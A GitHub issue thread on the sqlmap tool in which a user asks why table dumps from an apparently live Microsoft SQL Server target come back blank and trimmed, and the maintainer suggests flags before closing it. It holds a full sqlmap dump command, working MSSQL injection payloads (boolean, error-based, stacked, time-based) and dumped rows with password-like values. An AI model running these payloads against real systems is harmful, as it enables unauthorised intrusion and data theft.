### ISSUE TITLE
redundancy in dumping

### ISSUE THREAD

**Issue by qonsol-ctl** [sqlmapproject/sqlmap#4583]
**Describe the bug**
hey stamp .. i dont know if this is a bug or what but am dealing with a sql injection with multiple techniques but when i get to dump the data first it gives me  a lot of blanks and trimming at the output although it dump some rows pretty correct i tried to use force-pivoting (i thought i would get the whole table without trimming no luck :( .... ) but it keeps repeat the same result on and on  .....  

**To Reproduce**
1. Run '...'
sqlmap  -r target.txt --level=5 --risk=3 -p parameter --dbms=mssql -D Database -T Table -C Coulmns --dump--flush-session --force-pivoting
2. See error
just a single internal error 500 

**Expected behavior**
is there a way to dump all the table fully and without trimming

**Screenshots**
no need you are a genius 

**Running environment:**
 - sqlmap version latest
 - Installation method built in
 - Operating system: kali linux
 - Python version 3.7
**Target details:**
 - DBMS : Microsoft SQL Server
 - SQLi techniques found by sqlmap BEST
 - WAF/IPS the sqlmap tells me the it has some waf detect but i couldn't identify it 
 - Relevant console output [if any]
  <blank>             | <blank>  | 0                | <blank>           |
   | <blank>  |3    | password              |
 | <blank>  | 4            | asd123asd              |
| 0020                | <blank>  | 2              | wewhooo              |
| <blank>             | <blank>  | 0               | <blank>           |
                | <blank>  | 1          
 - Exception traceback [if any]

**Additional context**
sorry for my bad english am not an american ...

**Comment by stamparm** [comment]
`no need you are a genius` <- :D. i would really need something useful here

1) first thing that i could recommend is for you to try to force different techniques while dumping data and see if anything changes (e.g. `--fresh-queries --technique=B --dump -T ...`)
2) maybe you could retry everything with `--hex` and/or `--no-cast`/`--no-escape`

**Comment by qonsol-ctl** [comment]
thanks for your quick reply ... i tried different techniques same thing also i tried no-cast and/or hex same result ...

**Comment by qonsol-ctl** [comment]
sqlmap identified the following injection point(s) with a total of 692 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: catid=25269&currentPaging=1&in=4&perPage=12&sOrdering=(SELECT (CASE WHEN (6101=6101) THEN 1 ELSE (SELECT 8607 UNION SELECT 2381) END))

    Type: error-based
    Title: Microsoft SQL Server/Sybase error-based - ORDER BY clause
    Payload: catid=25269&currentPaging=1&in=4&perPage=12&sOrdering=1,(SELECT 6298 WHERE 6298=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6298=6298) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(113))))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: catid=25269&currentPaging=1&in=4&perPage=12&sOrdering=1;WAITFOR DELAY '0:0:5'--

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF)
    Payload: catid=25269&currentPaging=1&in=4&perPage=12&sOrdering=1 WAITFOR DELAY '0:0:5'

**Comment by qonsol-ctl** [comment]
with force-pivoting it keep dumping in redundant .. without it dumps the whole data with a lot of blank fields ..

**Comment by qonsol-ctl** [comment]
no proper pivot column provided (with unique values). It won't be possible to retrieve all rows can you explain it a littile further

**Comment by stamparm** [comment]
I can't help you without any "solid" data. You could provide me with more details privately via `miroslav@sqlmap.org` or I'll need to close this down as unreproducible

**Comment by stamparm** [comment]
i am closing this down until i get private data via email (if any)
